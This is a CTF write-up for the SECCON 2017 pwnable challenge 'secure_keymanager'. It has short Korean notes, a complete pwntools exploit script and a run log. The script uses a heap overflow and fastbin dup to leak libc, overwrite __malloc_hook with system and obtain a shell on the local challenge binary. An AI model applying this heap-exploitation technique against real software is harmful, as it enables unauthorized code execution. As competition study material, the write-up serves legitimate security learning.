SECCON 2017 QUAL - secure_keymanager

Category : pwnable

secure_keymanager-f9d02e8a1149ff866cad10f001e8f23803bcac3c42ed7ffdcbe50da40e8afd12.zip

Summary : simple heap overflow, fastbin dup into stack

그냥 fastbin문제. 헬게이트 문제로 기억했는데 다른거였나봄.. 하지만 이상한 삽질하다가 시간 더 걸린거 반성하기.

malloc_hook에서 원가젯 바로 못 쓰면 다른 hook 연동해서 간단하게 rsp 컨트롤하기.

malloc 인자 뭐들어가는지 제대로 기억하기.

ex.py

#!/usr/bin/python

from pwn import *

def cmd_add(key_len, title, key):
   ru('>> ')
   ss('1')
   ru('Input key length...')
   ss(str(key_len))
   ru('Input title...')
   ss(title)
   ru('Input key...')
   if key_len >= 0:
      ss(key)

def cmd_edit(idx, new_key, _account=None, _master=None):
   ru('>> ')
   ss('3')
   ru('EDIT KEY\n')
   ru('Input Account Name >> ')

   if _account:
      ss(_account)
      ru('Account \'')
      name = ru('\'')
      rl()
      return name
   else:
      ss(account)

   ru('Input Master Pass >> ')
   ss(master)
   ru('Input id to edit...')
   ss(str(idx))
   ru('Input new key...')
   ss(new_key)

def cmd_remove(idx, _account=None, _master=None):
   ru('>> ')
   ss('4')
   ru('REMOVE KEY\n')
   ru('Input Account Name >> ')

   if _account:
      ss(_account)
      ru('Account \'')
      name = ru('\'')
      rl()
      return name
   else:
      ss(account)
   ru('Input Master Pass >> ')
   ss(master)
   ru('Input id to remove...')
   ss(str(idx))

account    = 'pwn3r'
master     = '/bin/sh'


s = process('./secure_keymanager')
ru = s.recvuntil
rl = s.recvline
sl = s.sendline
ss = s.send

ss(account+'\x00')
ss(master+'\x00')

cmd_add(-16, 'chunk1', '')
cmd_add(16, 'chunk2', 'data')
cmd_add(0x68 - 32, 'chunk3', 'data')
libc_base = u64(cmd_edit(0, '', _account='a'*0x18)[0x18:-1].ljust(8, '\x00')) - 0x7a81b
libc_malloc_hook = libc_base + 0x3c4b10
libc_system = libc_base + 0x45390
master_addr = 0x602130 # "/bin/sh\x00"
print hex(libc_base)
cmd_remove(0)  # free chunk1
cmd_remove(2)  # free chunk3
cmd_add(-16, 'a'*0x18+p64(0xb1)[:-1], '')  # overwrite chunk2 size
cmd_edit(1, 'a'*0x10+p64(0)+p64(0x71)+p64(libc_malloc_hook - 0x23))    # overwrite chunk3 fd
cmd_add(0x68 - 32, 'chunk3 again', 'data') # chunk3 again

payload = 'a'*(0x23-0x10) + p64(libc_system)
cmd_add(0x68 - 32, payload, '\x00')       # *libc_malloc_hook = libc_system
ru('>> ')
ss('1')
ru('Input key length...')
ss(str(master_addr - 32))

s.interactive()
s.close()

Exploit

$ python ex.py
[+] Starting local process './secure_keymanager': pid 25650
0x7febf6a9d000
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)